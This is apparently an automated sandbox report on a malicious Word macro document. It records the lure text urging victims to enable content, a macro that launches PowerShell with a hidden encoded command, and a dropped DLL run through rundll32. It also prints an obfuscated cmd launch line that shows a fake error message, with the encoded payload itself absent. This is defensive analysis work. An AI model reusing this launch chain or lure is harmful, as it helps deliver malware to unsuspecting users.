                      Source: Yara match | File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 11.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

                      System Summary:

                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                      Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                      Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
                      Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 4,072 N@m 13 ;a 1009
                      Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
                      Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
                      Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll
                      Very long command line found
                      Source: unknown | Process created: Commandline size = 5777
                      Source: unknown | Process created: Commandline size = 5676
                      Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 5676
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Lahhvjcxlgt\
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10017D7D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100189F6
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10007605
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000620A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001F411
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000F813
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000D013
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10008816
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000421E
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001C424
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002628
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10004A2B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10018831
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10007E34
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000A83A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000903F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10014E4B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000704B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000D44C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001C04C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10005856
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10001658
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10011259
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10018668
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000C07D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10014693
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10004EA1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10008CA3
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100056B3
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10015AB8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10005EB9
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100106C2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10009CC8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10009AE1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100142E2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100094EC
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000CF11
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10015115
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001231B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001BF25
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001DB25
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000492A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001D530
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000213E
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000CB42
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10016B45
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001654F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10003D4E
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10018F65
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10012965
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001676B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10010F6D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10011B71
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10017570
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000A176
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001DD78
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10013D7C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001E19F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100199A4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10015DAA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10006BC0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100173C0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100177C0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10019DC0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100193C9
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10004BDE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10005BE1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002DEE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100137F4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001B3FE
                      Source: ARCHIVOFile-20-012021.doc | OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation | OLE, VBA macro: Module Bcur5699z4d, Function Document_open
                      Source: ARCHIVOFile-20-012021.doc | OLE indicator, VBA macros: true
                      Source: ARCHIVOFile-20-012021.doc | OLE indicator application name: unknown
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
                      Source: classification engine | Classification label: mal100.troj.evad.winDOC@32/14@6/100
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$CHIVOFile-20-012021.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRBF1A.tmp
                      Source: ARCHIVOFile-20-012021.doc | OLE indicator, Word Document stream: true
                      Source: ARCHIVOFile-20-012021.doc | OLE document summary: title field not present or empty
                      Source: ARCHIVOFile-20-012021.doc | OLE document summary: author field not present or empty
                      Source: ARCHIVOFile-20-012021.doc | OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exe | Console Write: ........................................ .A.......A.....................H...............#...............................h.......5kU.............
                      Source: C:\Windows\System32\msg.exe | Console Write: ................(...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................................................`I.........v.....................K........k.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................;@.j......................{.............}..v....X.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................;@.j..... {...............{.............}..v............0.................k.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.....................C.j......n...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................E.i......................C.j......k...............{.............}..v....H.......0.................k.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....#...............KC.j......................{.............}..v....p.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....#...............KC.j..... {...............{.............}..v............0...............h.k.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....7..................j.....Mk...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....7..................j....P.................{.............}..v............0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....C..................j.....Mk...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....C..................j....P.................{.............}..v............0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....O..................j.....Mk...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....O..................j....P.................{.............}..v............0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0...............8Jk.....(.......(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....[..................j......................{.............}..v.... .......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.8.4.............}..v....0.......0...............8Jk.....$.......(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....g..................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....s..................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....s..................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......................{.............}..v....h ......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0'......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....'................{.............}..v....h(......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0/......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j...../................{.............}..v....h0......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....07......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....7................{.............}..v....h8......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....Mk...............{.............}..v....0?......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j.....?................{.............}..v....h@......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....'..................j.....Mk...............{.............}..v....0G......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....G................{.............}..v....hH......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....Mk...............{.............}..v....0O......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....O................{.............}..v....hP......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....Mk...............{.............}..v....0W......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....W................{.............}..v....hX......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.....Mk...............{.............}..v....0_......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....._................{.............}..v....h`......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....Mk...............{.............}..v....0g......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....g................{.............}..v....hh......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....Mk...............{.............}..v....0o......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....o................{.............}..v....hp......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....Mk...............{.............}..v....0w......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....w................{.............}..v....hx......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....8.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v............0...............................(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....h.......0.......................r.......(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................{.............}..v............0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j.....Mk...............{.............}..v....0.......0...............8Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................~.j.....(................{.............}..v......".....0.................k.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................~.j.....(................{.............}..v....@S".....0.................k.............(...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
Source: ARCHIVOFile-20-012021.doc Virustotal: Detection: 48%
Source: ARCHIVOFile-20-012021.doc ReversingLabs: Detection: 50%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
